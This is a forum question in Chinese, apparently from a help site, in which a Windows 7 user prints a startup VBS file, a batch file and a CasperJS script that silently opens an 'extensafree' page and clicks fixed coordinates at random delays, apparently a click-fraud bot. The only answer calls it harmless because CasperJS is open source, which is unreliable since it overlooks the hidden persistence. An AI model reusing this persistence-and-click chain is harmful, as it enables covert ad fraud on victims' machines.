CasperJS 和“extensafree”病毒

CasperJS 和“extensafree”病毒

今天,当我启动计算机并加载 Windows 时,Notepad++ 打开了,其中加载了以下文件:

Set shell = WScript.CreateObject("WScript.Shell")
shell.Run("C:\projects\bat.bat"), 0 , True

然后我去调查“项目”文件夹,发现有两个名为 casperjs 和 phantomjs 的程序。bat.bat 文件中包含以下代码:

@echo off
timeout /t 600
cd/projects
phantomjs master.js

master.js 是最可疑的文件,因为其中包含以下代码:

phantom.casperPath = "/projects/casperjs";
phantom.injectJs(phantom.casperPath + '/bin/bootstrap.js');

var utils = require('utils');

var casper = require('casper').create();

var mouse = require("mouse").create(casper);

casper.userAgent('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36');
casper.start('http://www.extensafree.fulba.com/views/').viewport(1200, 1000);

function getRandomIntFromRange(min, max) {
    return Math.round(Math.random() * (max - min)) + min;
}    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1000, 6000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(190, 205);
                      });
          };    
          })(i, delay));
}    
});

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1000, 5000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

                  });
          };    
          })(i, delay));
}    
});


casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 7000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(900, 400);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 18000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(400, 100);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  };
      })(i, de    lay));
    }
});    

casper.then(function () {
    casper.exit();
});    

casper.run();

我立即移动了这些文件夹并从 Windows 开始菜单启动文件夹中删除了 shell.vbs。这是某种病毒吗?我需要进一步清理吗?我有 Avast 防病毒免费版和 Windows 7。两者都已完全更新。

答案1

我认为这不是病毒或类似的东西。

CasperJS 是一个用 Javascript 编写的 PhantomJS 和 SlimerJS 导航脚本和测试实用程序

这只是一个 JS 框架,所以你的脚本可能确实是一段糟糕的代码!这是官方的网站!它们是开源的,所以你可以验证一切!(大多数防病毒软件都有“发送”这样的功能,公司会测试发送的程序。)

相关内容